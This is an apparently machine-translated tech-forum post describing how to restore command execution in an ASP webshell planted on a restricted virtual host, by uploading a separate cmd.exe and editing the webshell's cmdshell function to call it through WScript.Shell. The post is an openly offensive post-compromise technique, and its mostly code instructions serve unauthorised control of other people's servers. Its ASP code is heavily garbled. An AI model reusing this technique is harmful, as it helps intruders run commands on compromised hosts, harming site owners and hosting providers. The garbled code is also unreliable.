2. Tech
  3. About the command prompt in Webshell does not have permission

About the command prompt in Webshell does not have permission

xiaoxiao2021-03-05  24

There are many friends asking him to get a Webshell, but I want to use the command to see what the user information is, but many hosts limit the execution command, so many webshells can't lose a lot of functions ... the first two Guilin veterans The ASP webmaster assistant 6.0 just came out, I took the ASP webmaster assistant 6.0 as an example to upload it to a virtual host that is forbidden, then uploads a cmd.exe, then call the CMD you upload to execute the command ..... .

I originally wanted to figure out the tutorial, but I feel too simple, the text can explain it clearly.

1. Open the ASP webmaster assistant 6.0 Click the command prompt to display "No Permissions"

2. Upload a cmd.exe (Win / System32 / cmd.exe) to your WebShell directory with the ASP stationmaster assistant 6.0 upload function (in other directories, put the cmd.exe absolute path of the uploaded COPY)

3. Modify your Webshell to find the code called cmd.exe

Function cmdshell () if Request ("cmd") <> "" "" cmd ") Else Defcmd =" ​​DIR "& session (" FolderPath ") end if si =" "Si = Si &" "Si = Si & Si & "
  = Si & Server.createObject (" wscript.shell "). EXEC (" cmd.exe / c "& defcmd) .stdout.readall
                                                   Example: c: /progra ~ 1/winrar/rar.exe ad: /web/test/web1.rar d: / web / test / Web1 "response.write si end function modified code function cmdshell () IF REQUEST ("cmd") <> "" "" Si = Si & "" "Si = Si &" "" Si = Si & "" "Si = Si &" "" Si = Si & "" Si & Session ("FolderPath") ELSE DEFCMD = "DIR") ELSE DEFCMD = "Si = Si &" "Si = Si &"
   = Si & Server.createObject ("wscript.shell"). EXEC ("You want to upload cmd.exe absolute path / c" & defcmd) .stdout.readall
   = Si & Chr (13) & "RRAR command line Example: C: /Progra ~ 1/winrar/rar.exe ad: /web/test/web1.rar d: / web / test / Web1 "response.write Si End Function

In order to see you clearly, you can change it.

The original:

Si = Si & Server.createObject ("wscript.shell"). EXEC ("cmd.exe / c" & defcmd) .stdout.readall modified: Si = Si & Server.createObject ("wscript.shell"). EXEC ("You want to upload CMD.exe absolute path / c "& defcmd) .stdout.readall, such as your rising directory is d: /web/www/cmd.exe, then modify:

Si = Si & Server.createObject ("wscript.shell"). EXEC ("D: /WEB/www/cmd.exe / c" & defcmd) .stdout.readall

This allows the command prompt in your webshell to be used ...

转载请注明原文地址:https://www.9cbs.com/read-35901.html

9cbs

New Post(0)